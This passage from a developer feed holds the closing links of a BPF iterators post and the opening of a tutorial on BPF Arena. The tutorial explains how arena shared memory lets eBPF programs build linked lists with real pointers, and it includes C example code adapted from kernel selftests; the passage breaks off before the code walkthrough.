&lt;strong&gt;Tutorial Repository:&lt;/strong&gt; &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_iters&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;libbpf Iterator API:&lt;/strong&gt; &lt;a href="https://github.com/libbpf/libbpf" rel="noopener noreferrer"&gt;https://github.com/libbpf/libbpf&lt;/a&gt;
&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;BPF Helpers Manual:&lt;/strong&gt; &lt;a href="https://man7.org/linux/man-pages/man7/bpf-helpers.7.html" rel="noopener noreferrer"&gt;https://man7.org/linux/man-pages/man7/bpf-helpers.7.html&lt;/a&gt;
&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;Examples adapted from Linux kernel BPF selftests with educational enhancements. Requires Linux kernel 5.8+ for iterator support, BTF enabled, and libbpf. Complete source code available in the tutorial repository.&lt;/p&gt;

</description>
      <category>ebpf</category>
      <category>iterator</category>
      <category>kernel</category>
    </item>
    <item>
      <title>eBPF Tutorial by Example: BPF Arena for Zero-Copy Shared Memory</title>
      <dc:creator>云微</dc:creator>
      <pubDate>Tue, 06 Jan 2026 07:19:17 +0000</pubDate>
      <link>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-arena-for-zero-copy-shared-memory-nf</link>
      <guid>https://forem.com/yunwei37/ebpf-tutorial-by-example-bpf-arena-for-zero-copy-shared-memory-nf</guid>
      <description>&lt;p&gt;Ever tried building a linked list in eBPF and got stuck using awkward integer indices instead of real pointers? Or needed to share large amounts of data between your kernel BPF program and userspace without expensive syscalls? Traditional BPF maps force you to work around pointer limitations and require system calls for every access. What if you could just use normal C pointers and have direct memory access from both kernel and userspace?&lt;/p&gt;

&lt;p&gt;This is what &lt;strong&gt;BPF Arena&lt;/strong&gt; solves. Created by Alexei Starovoitov in 2024, arena provides a sparse shared memory region where BPF programs can use real pointers to build complex data structures like linked lists, trees, and graphs, while userspace gets zero-copy direct access to the same memory. In this tutorial, we'll build a linked list in arena memory and show you how both kernel and userspace can manipulate it using standard pointer operations.&lt;/p&gt;

&lt;blockquote&gt;
&lt;p&gt;The complete source code: &lt;a href="https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena" rel="noopener noreferrer"&gt;https://github.com/eunomia-bpf/bpf-developer-tutorial/tree/main/src/features/bpf_arena&lt;/a&gt;&lt;/p&gt;
&lt;/blockquote&gt;

&lt;h2&gt;
  
  
  Introduction to BPF Arena: Breaking Free from Map Limitations
&lt;/h2&gt;

&lt;h3&gt;
  
  
  The Problem: When BPF Maps Aren't Enough
&lt;/h3&gt;

&lt;p&gt;Traditional BPF maps are fantastic for simple key-value storage, but they have fundamental limitations when you need complex data structures or large-scale data sharing. Let's look at what developers faced before arena existed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Ring buffers&lt;/strong&gt; only work in one direction - BPF can send data to userspace, but userspace can't write back. They're streaming-only, no random access. &lt;strong&gt;Hash and array maps&lt;/strong&gt; require syscalls like &lt;code&gt;bpf_map_lookup_elem()&lt;/code&gt; for every access from userspace. Array maps allocate all their memory upfront, wasting space if you only use a fraction of entries. Most critically, &lt;strong&gt;you can't use real pointers&lt;/strong&gt; - you're forced to use integer indices to link data structures together.&lt;/p&gt;

&lt;p&gt;Building a linked list the old way looked like this mess:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;next_idx&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// Can't use pointers, must use index!&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARRAY&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;10000&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__type&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;nodes_map&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Traverse requires repeated map lookups&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;head_idx&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;!=&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_map_lookup_elem&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;nodes_map&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;idx&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="k"&gt;if&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;!&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="k"&gt;break&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;process&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;idx&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;next_idx&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// No pointer following!&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Every node access requires a map lookup. You can't just follow pointers like normal C code. The verifier won't let you use pointers across different map entries. This makes implementing trees, graphs, or any pointer-based structure incredibly awkward and slow.&lt;/p&gt;

&lt;h3&gt;
  
  
  The Solution: Sparse Shared Memory with Real Pointers
&lt;/h3&gt;

&lt;p&gt;In 2024, Alexei Starovoitov from the Linux kernel team introduced BPF arena to solve these limitations. Arena provides a &lt;strong&gt;sparse shared memory region&lt;/strong&gt; between BPF programs and userspace, supporting up to 4GB of address space. Memory pages are allocated on-demand as you use them, so you don't waste space. Both kernel BPF code and userspace programs can map the same arena and access it directly.&lt;/p&gt;

&lt;p&gt;The game-changer: you can use &lt;strong&gt;real C pointers&lt;/strong&gt; in BPF programs targeting arena memory. The &lt;code&gt;__arena&lt;/code&gt; annotation tells the verifier that these pointers reference arena space, and special address space casts (&lt;code&gt;cast_kern()&lt;/code&gt;, &lt;code&gt;cast_user()&lt;/code&gt;) let you safely convert between kernel and userspace views of the same memory. Userspace gets zero-copy access through &lt;code&gt;mmap()&lt;/code&gt; - no syscalls needed to read or write arena data.&lt;/p&gt;

&lt;p&gt;Here's what the same linked list looks like with arena:&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// Real pointer!&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// Traverse with normal pointer following&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;while&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;process&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;data&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;next&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;  &lt;span class="c1"&gt;// Just follow the pointer!&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Clean, simple, exactly how you'd write it in normal C. The verifier understands arena pointers and lets you dereference them safely.&lt;/p&gt;

&lt;h3&gt;
  
  
  Why This Matters
&lt;/h3&gt;

&lt;p&gt;Arena was inspired by research showing the potential for complex data structures in BPF. Before arena, developers were building hash tables, queues, and trees using giant BPF array maps with integer indices instead of pointers. It worked, but the code was ugly and slow. Arena unlocks several powerful use cases.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;In-kernel data structures&lt;/strong&gt; become practical. You can implement custom hash tables with collision chaining, AVL or red-black trees for sorted data, graphs for network topology mapping, all using normal pointer operations. &lt;strong&gt;Key-value store accelerators&lt;/strong&gt; can run in the kernel for maximum performance, with userspace getting direct access to the data structure without syscall overhead. &lt;strong&gt;Bidirectional communication&lt;/strong&gt; works naturally - both kernel and userspace can modify shared data structures using lock-free algorithms. &lt;strong&gt;Large data aggregation&lt;/strong&gt; scales up to 4GB instead of being limited by typical map size constraints.&lt;/p&gt;

&lt;h2&gt;
  
  
  Implementation: Building a Linked List in Arena Memory
&lt;/h2&gt;

&lt;p&gt;Let's build a complete example that demonstrates arena's power. We'll create a linked list where BPF programs add and delete elements using real pointers, while userspace directly accesses the list to compute sums without any syscalls.&lt;/p&gt;

&lt;h3&gt;
  
  
  Complete BPF Program: arena_list.bpf.c
&lt;/h3&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight c"&gt;&lt;code&gt;&lt;span class="c1"&gt;// SPDX-License-Identifier: GPL-2.0&lt;/span&gt;
&lt;span class="cm"&gt;/* Copyright (c) 2024 Meta Platforms, Inc. and affiliates. */&lt;/span&gt;
&lt;span class="cp"&gt;#define BPF_NO_KFUNC_PROTOTYPES
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;vmlinux.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_helpers.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_tracing.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;&amp;lt;bpf/bpf_core_read.h&amp;gt;&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_experimental.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;type&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_MAP_TYPE_ARENA&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_flags&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;BPF_F_MMAPABLE&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="n"&gt;__uint&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;max_entries&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mi"&gt;100&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* number of pages */&lt;/span&gt;
&lt;span class="cp"&gt;#ifdef __TARGET_ARCH_arm64
&lt;/span&gt;    &lt;span class="n"&gt;__ulong&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_extra&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x1ull&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;32&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* start of mmap() region */&lt;/span&gt;
&lt;span class="cp"&gt;#else
&lt;/span&gt;    &lt;span class="n"&gt;__ulong&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;map_extra&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="mh"&gt;0x1ull&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&amp;lt;&lt;/span&gt; &lt;span class="mi"&gt;44&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt; &lt;span class="cm"&gt;/* start of mmap() region */&lt;/span&gt;
&lt;span class="cp"&gt;#endif
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="n"&gt;arena&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".maps"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="cp"&gt;#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_arena_alloc.h"&lt;/span&gt;&lt;span class="cp"&gt;
#include&lt;/span&gt; &lt;span class="cpf"&gt;"bpf_arena_list.h"&lt;/span&gt;&lt;span class="cp"&gt;
&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_node&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_head&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;list_sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="n"&gt;bool&lt;/span&gt; &lt;span class="n"&gt;skip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;false&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="cp"&gt;#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
&lt;/span&gt;&lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="n"&gt;arena_sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="n"&gt;test_val&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;1&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;arena_list_head&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="n"&gt;global_head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#else
&lt;/span&gt;&lt;span class="kt"&gt;long&lt;/span&gt; &lt;span class="n"&gt;arena_sum&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".addr_space.1"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;test_val&lt;/span&gt; &lt;span class="nf"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;".addr_space.1"&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="cp"&gt;#endif
&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"syscall"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;arena_list_add&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="cp"&gt;#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
&lt;/span&gt;    &lt;span class="n"&gt;__u64&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;list_head&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;global_head&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="k"&gt;for&lt;/span&gt; &lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;zero&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt; &lt;span class="n"&gt;cnt&lt;/span&gt; &lt;span class="o"&gt;&amp;amp;&amp;amp;&lt;/span&gt; &lt;span class="n"&gt;can_loop&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;bpf_alloc&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;sizeof&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;

        &lt;span class="n"&gt;test_val&lt;/span&gt;&lt;span class="o"&gt;++&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;arena_sum&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;i&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;list_add_head&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
&lt;span class="cp"&gt;#else
&lt;/span&gt;    &lt;span class="n"&gt;skip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#endif
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"syscall"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="nf"&gt;arena_list_del&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="kt"&gt;void&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;ctx&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="p"&gt;{&lt;/span&gt;
&lt;span class="cp"&gt;#ifdef __BPF_FEATURE_ADDR_SPACE_CAST
&lt;/span&gt;    &lt;span class="k"&gt;struct&lt;/span&gt; &lt;span class="n"&gt;elem&lt;/span&gt; &lt;span class="n"&gt;__arena&lt;/span&gt; &lt;span class="o"&gt;*&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="kt"&gt;int&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

    &lt;span class="n"&gt;arena_sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
    &lt;span class="n"&gt;list_for_each_entry&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;list_head&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
        &lt;span class="n"&gt;sum&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;arena_sum&lt;/span&gt; &lt;span class="o"&gt;+=&lt;/span&gt; &lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;value&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
        &lt;span class="n"&gt;list_del&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="o"&gt;&amp;amp;&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="o"&gt;-&amp;gt;&lt;/span&gt;&lt;span class="n"&gt;node&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
        &lt;span class="n"&gt;bpf_free&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
    &lt;span class="p"&gt;}&lt;/span&gt;
    &lt;span class="n"&gt;list_sum&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;sum&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#else
&lt;/span&gt;    &lt;span class="n"&gt;skip&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="nb"&gt;true&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="cp"&gt;#endif
&lt;/span&gt;    &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="kt"&gt;char&lt;/span&gt; &lt;span class="n"&gt;_license&lt;/span&gt;&lt;span class="p"&gt;[]&lt;/span&gt; &lt;span class="n"&gt;SEC&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s"&gt;"license"&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="s"&gt;"GPL"&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h3&gt;
  
  
  Understanding the BPF Code
&lt;/h3&gt;

